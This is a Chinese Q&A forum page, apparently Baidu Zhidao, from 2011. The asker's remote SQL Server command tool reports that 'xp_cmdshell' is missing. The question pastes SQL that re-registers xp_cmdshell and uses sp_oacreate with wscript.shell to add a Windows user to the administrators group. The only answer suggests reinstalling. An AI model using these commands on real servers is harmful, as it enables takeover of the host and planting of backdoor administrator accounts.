SQLTOOLS出现的问题

为什么我连接上去了但是要执行的时候出现了C:\>DIRC:\未能找到存储过程'master..xp_cmdshell'。怎么回是啊!1未能找到存储过程'master... 为什么我连接上去了但是 要执行的时候出现了C:\>DIR C:\未能找到存储过程 'master..xp_cmdshell'。怎么回是啊!1 未能找到存储过程'master..xpcmdshell'。恢复方法:查询分离器连接后,第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int,第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll',然后按F5键命令执行完毕。2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一DLL。原因126(找不到指定模块。)恢复方法:查询分离器连接后,第一步执行:sp_dropextendedproc "xp_cmdshell",第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'然后按F5键命令执行完毕。3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)恢复方法:查询分离器连接后,第一步执行:exec sp_dropextendedproc 'xp_cmdshell'第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'然后按F5键命令执行完毕。四.终极方法:如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:查询分离器连接后,2000servser系统:declare @shell int exec sp_oacreate 'wscript.shell',@shell outputexec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod@shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'xp或2003server系统:declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod@shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod@shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'这个就别发了,,,这早就用过了没用,还是一样,后来我叫人弄了一下,可以了 但是再上就没了 还是出现未能找到存储过程'master..xpcmdshell'。能帮我解决的我追加50分!!! 展开
 我来答
heraleign
2011-10-22 · 超过13用户采纳过TA的回答
知道答主
回答量:59
采纳率:0%
帮助的人:33.3万
展开全部
晕,重新安装就可以了噻,是因为文件被损坏
已赞过 已踩过<
你对这个回答的评价是?
评论 收起
推荐律师服务: 若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询

为你推荐:

下载百度知道APP,抢鲜体验
使用百度知道APP,立即抢鲜体验。你的手机镜头里或许有别人想知道的答案。
扫描二维码下载
×

类别

我们会通过消息、邮箱等方式尽快将举报结果通知您。

说明

0/200

提交
取消

辅 助

模 式